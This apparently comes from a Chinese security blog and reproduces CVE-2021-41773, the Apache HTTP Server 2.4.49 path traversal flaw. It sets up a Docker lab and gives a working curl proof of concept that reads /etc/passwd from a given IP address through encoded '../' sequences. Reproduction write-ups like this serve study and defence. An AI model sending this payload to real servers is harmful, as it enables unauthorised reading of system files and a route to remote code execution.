常见中间件漏洞复现之【Apache】!

CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
--------------------

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
-------------------

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
-------------------

漏洞复现

打开网页

使用poc

复制代码
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
HMS Core35 分钟前
鸿蒙版小红书如何让图库访问完全由“你”掌控
安全·华为·harmonyos
pingxiaozhao1 小时前
在Ubuntu内网环境中为Gogs配置HTTPS访问(通过Apache反向代理使用IP地址)
ubuntu·https·apache
jingshaoyou1 小时前
【11】Strongswan processor 详解1
网络·网络安全
SeaTunnel2 小时前
【同步教程】基于Apache SeaTunnel从MySQL同步到MySQL——Demo方舟计划
大数据·人工智能·apache·etl
拾柒SHY2 小时前
WEB安全-CTF中的PHP反序列化漏洞
web安全·网络安全
群联云防护小杜2 小时前
基于AI的Web应用防火墙(AppWall)实战:漏洞拦截与威胁情报集成
前端·分布式·安全·ddos
Codingwiz_Joy3 小时前
Day21 -GitHub监控工具~Github-monitor的配置
安全·github·安全性测试
白猫a٩3 小时前
记一次某网络安全比赛三阶段webserver应急响应解题过程
安全·web安全·网络安全
QC七哥6 小时前
程序加壳脱壳原理和实现
安全
密码小丑6 小时前
玄机-apache日志分析
网络·笔记·apache